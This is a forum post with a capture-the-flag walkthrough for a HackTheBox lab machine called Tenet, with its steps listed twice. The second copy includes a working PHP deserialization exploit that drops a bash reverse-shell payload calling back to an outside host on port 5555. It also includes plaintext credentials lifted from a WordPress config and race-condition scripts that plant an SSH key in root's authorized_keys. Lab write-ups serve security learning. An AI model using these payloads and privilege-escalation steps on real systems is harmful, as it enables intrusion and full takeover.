January 17, 2021 at 08:40 PM
This post was last modified: January 17, 2021 at 09:09 PM by dory23. Edited 5 times in total.
1. while checking tenet.htb we can see the comment of neil that there is a backup called sator
2. add sator.tenet.htb in /etc/hosts
3. remembering there is a sator.php.bak inside of sator.tenet.htb we can access it using sator.tenet.htb/sator.php.bak
4. while checking the code it was a PHP Object injection so it is a deserialization
- Check this https://medium.com/swlh/exploiting-php-d...d71f03282a and https://www.exploit-db.com/docs/english/...bility.pdf
we will just edit the code
from this
to This
5. then we will get a reverse shell on port 5555
6. after getting a reverse shell check wordpress/wp-config.php there is the credentials of neil
7. ssh into the user neil to get the user.txt
8. sudo -l we can see /usr/local/bin/enableSSH.sh is runnable as root
9. by checking the code we can see there is a race condition there
10. we should generate a id_rsa using ssh-keygen -t rsa
11. then on the 10.10.10.223 machine create a add_rsa.sh
12. then create a script to run the enableSSH.sh and name it 1.sh
13. chmod 600 id_rsa , then after a few minutes or seconds ssh into root
14. ssh -i id_rsa [email protected]
if you liked the writeup give rep up and
2. add sator.tenet.htb in /etc/hosts
3. remembering there is a sator.php.bak inside of sator.tenet.htb we can access it using sator.tenet.htb/sator.php.bak
4. while checking the code it was a PHP Object injection so it is a deserialization
- Check this https://medium.com/swlh/exploiting-php-d...d71f03282a and https://www.exploit-db.com/docs/english/...bility.pdf
we will just edit the code
from this
<?php
class DatabaseExport
{
public $user_file = 'users.txt';
public $data = '';
public function update_db()
{
echo '[+] Grabbing users from text file <br>';
$this-> data = 'Success';
}
public function __destruct()
{
file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
echo '[] Database updated <br>';
// echo 'Gotta get this working properly...';
}
}
$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);
$app = new DatabaseExport;
$app -> update_db();
?>
to This
<?php
class DatabaseExport
{
public $user_file = 'test.php';
public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/ip/5555 0>&1\'"); ?>';
public function __destruct()
{
file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
echo '[] Database updated';
}
}
$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
$response = file_get_contents("http://10.10.10.223/test.php");
?>
5. then we will get a reverse shell on port 5555
6. after getting a reverse shell check wordpress/wp-config.php there is the credentials of neil
neil
Opera2113
7. ssh into the user neil to get the user.txt
8. sudo -l we can see /usr/local/bin/enableSSH.sh is runnable as root
9. by checking the code we can see there is a race condition there
<snipped>
addKey() {
tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
(umask 110; touch $tmpName)
/bin/echo $key >>$tmpName
checkFile $tmpName
/bin/cat $tmpName >>/root/.ssh/authorized_keys
/bin/rm $tmpName
}
10. we should generate a id_rsa using ssh-keygen -t rsa
11. then on the 10.10.10.223 machine create a add_rsa.sh
while true
do
echo "ssh-rsa key" | tee /tmp/ssh-*
done
12. then create a script to run the enableSSH.sh and name it 1.sh
while true
do
sudo /usr/local/bin/enableSSH.sh
done
13. chmod 600 id_rsa , then after a few minutes or seconds ssh into root
14. ssh -i id_rsa [email protected]
if you liked the writeup give rep up and